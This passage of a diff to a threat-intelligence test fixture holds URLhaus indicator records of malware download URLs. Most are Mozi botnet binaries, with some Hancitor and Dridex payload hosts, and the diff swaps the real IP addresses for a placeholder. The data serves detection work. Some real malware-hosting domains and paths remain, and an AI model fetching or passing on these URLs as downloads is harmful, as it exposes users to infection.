listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026805800Z", + "original": "{\"id\":\"961222\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961222/\",\"url\":\"http://89.160.20.156:53943/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15623,18 +15623,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.59.212.117:40404/Mozi.m", + "original": "http://89.160.20.156:40404/Mozi.m", "scheme": "http", "port": 40404, - "domain": "115.59.212.117", - "full": "http://115.59.212.117:40404/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40404/Mozi.m" }, - "ip": "115.59.212.117" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693712266Z", - "original": "{\"id\":\"961223\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961223/\",\"url\":\"http://115.59.212.117:40404/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.59.212.117\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026812700Z", + "original": "{\"id\":\"961223\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961223/\",\"url\":\"http://89.160.20.156:40404/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15672,18 +15672,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.114.210.156:46738/Mozi.m", + "original": "http://89.160.20.156:46738/Mozi.m", "scheme": "http", "port": 46738, - "domain": "182.114.210.156", - "full": "http://182.114.210.156:46738/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46738/Mozi.m" }, - "ip": "182.114.210.156" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693715662Z", - "original": "{\"id\":\"961224\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961224/\",\"url\":\"http://182.114.210.156:46738/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.114.210.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026819600Z", + "original": "{\"id\":\"961224\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961224/\",\"url\":\"http://89.160.20.156:46738/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15721,18 +15721,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://123.12.231.116:58234/Mozi.m", + "original": "http://89.160.20.156:58234/Mozi.m", "scheme": "http", "port": 58234, - "domain": "123.12.231.116", - "full": "http://123.12.231.116:58234/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:58234/Mozi.m" }, - "ip": "123.12.231.116" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693718898Z", - "original": "{\"id\":\"961225\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961225/\",\"url\":\"http://123.12.231.116:58234/Mozi.m\",\"url_status\":\"online\",\"host\":\"123.12.231.116\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026826400Z", + "original": "{\"id\":\"961225\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961225/\",\"url\":\"http://89.160.20.156:58234/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15770,18 +15770,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.59.230.66:36911/Mozi.a", + "original": "http://89.160.20.156:36911/Mozi.a", "scheme": "http", "port": 36911, - "domain": "182.59.230.66", - "full": "http://182.59.230.66:36911/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36911/Mozi.a" }, - "ip": "182.59.230.66" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693722004Z", - "original": "{\"id\":\"961226\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961226/\",\"url\":\"http://182.59.230.66:36911/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.59.230.66\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026833400Z", + "original": "{\"id\":\"961226\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961226/\",\"url\":\"http://89.160.20.156:36911/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:50:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15819,18 +15819,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.207.21.23:35028/Mozi.m", + "original": "http://89.160.20.156:35028/Mozi.m", "scheme": "http", "port": 35028, - "domain": "115.207.21.23", - "full": "http://115.207.21.23:35028/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35028/Mozi.m" }, - "ip": "115.207.21.23" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693725340Z", - "original": "{\"id\":\"961220\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961220/\",\"url\":\"http://115.207.21.23:35028/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.207.21.23\",\"date_added\":\"2021-01-14 18:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026840400Z", + "original": "{\"id\":\"961220\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961220/\",\"url\":\"http://89.160.20.156:35028/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:49:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -15877,7 +15877,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693728476Z", + "ingested": "2021-12-13T08:40:08.026847300Z", "original": "{\"id\":\"961219\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961219/\",\"url\":\"http://allanabolicsteam.net/nedfr_.exe\",\"url_status\":\"offline\",\"host\":\"allanabolicsteam.net\",\"date_added\":\"2021-01-14 18:47:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"Myrtus0x0\",\"larted\":\"true\",\"tags\":[\"c2\",\"hancitor\",\"payload\"]}", "category": "threat", "type": "indicator", @@ -15923,7 +15923,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693731722Z", + "ingested": "2021-12-13T08:40:08.026854400Z", "original": "{\"id\":\"961217\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961217/\",\"url\":\"https://intranetstc.micromart.com.br/fined.php\",\"url_status\":\"offline\",\"host\":\"intranetstc.micromart.com.br\",\"date_added\":\"2021-01-14 18:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"0x49736b\",\"larted\":\"false\",\"tags\":[\"Dridex\"]}", "category": "threat", "type": "indicator", @@ -15971,7 +15971,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693735049Z", + "ingested": "2021-12-13T08:40:08.026861300Z", "original": "{\"id\":\"961218\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961218/\",\"url\":\"http://allanabolicsteam.net/1301s.bin\",\"url_status\":\"online\",\"host\":\"allanabolicsteam.net\",\"date_added\":\"2021-01-14 18:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"Myrtus0x0\",\"larted\":\"true\",\"tags\":[\"c2\",\"hancitor\",\"payload\"]}", "category": "threat", "type": "indicator", @@ -16010,18 +16010,18 @@ "provider": "geenensp", "url": { "path": "/i", - "original": "http://61.53.222.100:43741/i", + "original": "http://89.160.20.156:43741/i", "scheme": "http", "port": 43741, - "domain": "61.53.222.100", - "full": "http://61.53.222.100:43741/i" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43741/i" }, - "ip": "61.53.222.100" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693738124Z", - "original": "{\"id\":\"961216\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961216/\",\"url\":\"http://61.53.222.100:43741/i\",\"url_status\":\"online\",\"host\":\"61.53.222.100\",\"date_added\":\"2021-01-14 18:44:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026868200Z", + "original": "{\"id\":\"961216\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961216/\",\"url\":\"http://89.160.20.156:43741/i\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:44:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16060,18 +16060,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://42.225.52.44:45803/bin.sh", + "original": "http://89.160.20.156:45803/bin.sh", "scheme": "http", "port": 45803, - "domain": "42.225.52.44", - "full": "http://42.225.52.44:45803/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45803/bin.sh" }, - "ip": "42.225.52.44" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693741431Z", - "original": "{\"id\":\"961215\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961215/\",\"url\":\"http://42.225.52.44:45803/bin.sh\",\"url_status\":\"offline\",\"host\":\"42.225.52.44\",\"date_added\":\"2021-01-14 18:41:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"false\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.026875200Z", + "original": "{\"id\":\"961215\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961215/\",\"url\":\"http://89.160.20.156:45803/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:41:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"false\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16109,18 +16109,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://191.242.38.33:38611/Mozi.m", + "original": "http://89.160.20.156:38611/Mozi.m", "scheme": "http", "port": 38611, - "domain": "191.242.38.33", - "full": "http://191.242.38.33:38611/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38611/Mozi.m" }, - "ip": "191.242.38.33" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693744807Z", - "original": "{\"id\":\"961214\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961214/\",\"url\":\"http://191.242.38.33:38611/Mozi.m\",\"url_status\":\"offline\",\"host\":\"191.242.38.33\",\"date_added\":\"2021-01-14 18:36:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026882200Z", + "original": "{\"id\":\"961214\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961214/\",\"url\":\"http://89.160.20.156:38611/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"false\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16158,18 +16158,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.97.171.225:35185/Mozi.m", + "original": "http://89.160.20.156:35185/Mozi.m", "scheme": "http", "port": 35185, - "domain": "59.97.171.225", - "full": "http://59.97.171.225:35185/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35185/Mozi.m" }, - "ip": "59.97.171.225" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693748093Z", - "original": "{\"id\":\"961213\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961213/\",\"url\":\"http://59.97.171.225:35185/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.97.171.225\",\"date_added\":\"2021-01-14 18:36:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026889200Z", + "original": "{\"id\":\"961213\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961213/\",\"url\":\"http://89.160.20.156:35185/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16207,18 +16207,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://189.51.102.115:35054/Mozi.m", + "original": "http://89.160.20.156:35054/Mozi.m", "scheme": "http", "port": 35054, - "domain": "189.51.102.115", - "full": "http://189.51.102.115:35054/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:35054/Mozi.m" }, - "ip": "189.51.102.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693751319Z", - "original": "{\"id\":\"961212\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961212/\",\"url\":\"http://189.51.102.115:35054/Mozi.m\",\"url_status\":\"offline\",\"host\":\"189.51.102.115\",\"date_added\":\"2021-01-14 18:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026896100Z", + "original": "{\"id\":\"961212\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961212/\",\"url\":\"http://89.160.20.156:35054/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16256,18 +16256,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.235.186.115:60038/Mozi.m", + "original": "http://89.160.20.156:60038/Mozi.m", "scheme": "http", "port": 60038, - "domain": "42.235.186.115", - "full": "http://42.235.186.115:60038/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60038/Mozi.m" }, - "ip": "42.235.186.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693755517Z", - "original": "{\"id\":\"961207\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961207/\",\"url\":\"http://42.235.186.115:60038/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.235.186.115\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026903Z", + "original": "{\"id\":\"961207\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961207/\",\"url\":\"http://89.160.20.156:60038/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16305,18 +16305,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://219.157.134.199:52253/Mozi.m", + "original": "http://89.160.20.156:52253/Mozi.m", "scheme": "http", "port": 52253, - "domain": "219.157.134.199", - "full": "http://219.157.134.199:52253/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52253/Mozi.m" }, - "ip": "219.157.134.199" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693759104Z", - "original": "{\"id\":\"961208\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961208/\",\"url\":\"http://219.157.134.199:52253/Mozi.m\",\"url_status\":\"online\",\"host\":\"219.157.134.199\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026910Z", + "original": "{\"id\":\"961208\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961208/\",\"url\":\"http://89.160.20.156:52253/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16354,18 +16354,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://221.14.21.135:43125/Mozi.m", + "original": "http://89.160.20.156:43125/Mozi.m", "scheme": "http", "port": 43125, - "domain": "221.14.21.135", - "full": "http://221.14.21.135:43125/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43125/Mozi.m" }, - "ip": "221.14.21.135" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693762470Z", - "original": "{\"id\":\"961209\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961209/\",\"url\":\"http://221.14.21.135:43125/Mozi.m\",\"url_status\":\"online\",\"host\":\"221.14.21.135\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026916900Z", + "original": "{\"id\":\"961209\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961209/\",\"url\":\"http://89.160.20.156:43125/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16403,18 +16403,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://58.248.118.230:52650/Mozi.a", + "original": "http://89.160.20.156:52650/Mozi.a", "scheme": "http", "port": 52650, - "domain": "58.248.118.230", - "full": "http://58.248.118.230:52650/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52650/Mozi.a" }, - "ip": "58.248.118.230" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693765806Z", - "original": "{\"id\":\"961210\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961210/\",\"url\":\"http://58.248.118.230:52650/Mozi.a\",\"url_status\":\"online\",\"host\":\"58.248.118.230\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026923900Z", + "original": "{\"id\":\"961210\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961210/\",\"url\":\"http://89.160.20.156:52650/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16452,18 +16452,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://219.155.30.125:59273/Mozi.m", + "original": "http://89.160.20.156:59273/Mozi.m", "scheme": "http", "port": 59273, - "domain": "219.155.30.125", - "full": "http://219.155.30.125:59273/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:59273/Mozi.m" }, - "ip": "219.155.30.125" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693769173Z", - "original": "{\"id\":\"961211\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961211/\",\"url\":\"http://219.155.30.125:59273/Mozi.m\",\"url_status\":\"online\",\"host\":\"219.155.30.125\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026930800Z", + "original": "{\"id\":\"961211\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961211/\",\"url\":\"http://89.160.20.156:59273/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16501,18 +16501,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://121.159.74.78:40346/Mozi.m", + "original": "http://89.160.20.156:40346/Mozi.m", "scheme": "http", "port": 40346, - "domain": "121.159.74.78", - "full": "http://121.159.74.78:40346/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:40346/Mozi.m" }, - "ip": "121.159.74.78" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693772429Z", - "original": "{\"id\":\"961206\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961206/\",\"url\":\"http://121.159.74.78:40346/Mozi.m\",\"url_status\":\"online\",\"host\":\"121.159.74.78\",\"date_added\":\"2021-01-14 18:35:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026937700Z", + "original": "{\"id\":\"961206\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961206/\",\"url\":\"http://89.160.20.156:40346/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:08 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16550,18 +16550,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://179.227.77.63:44242/Mozi.m", + "original": "http://89.160.20.156:44242/Mozi.m", "scheme": "http", "port": 44242, - "domain": "179.227.77.63", - "full": "http://179.227.77.63:44242/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44242/Mozi.m" }, - "ip": "179.227.77.63" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693775675Z", - "original": "{\"id\":\"961204\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961204/\",\"url\":\"http://179.227.77.63:44242/Mozi.m\",\"url_status\":\"offline\",\"host\":\"179.227.77.63\",\"date_added\":\"2021-01-14 18:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.026944700Z", + "original": "{\"id\":\"961204\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961204/\",\"url\":\"http://89.160.20.156:44242/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 18:35:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -16599,18 +16599,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://117.194.167.179:40624/Mozi.m", + "original": 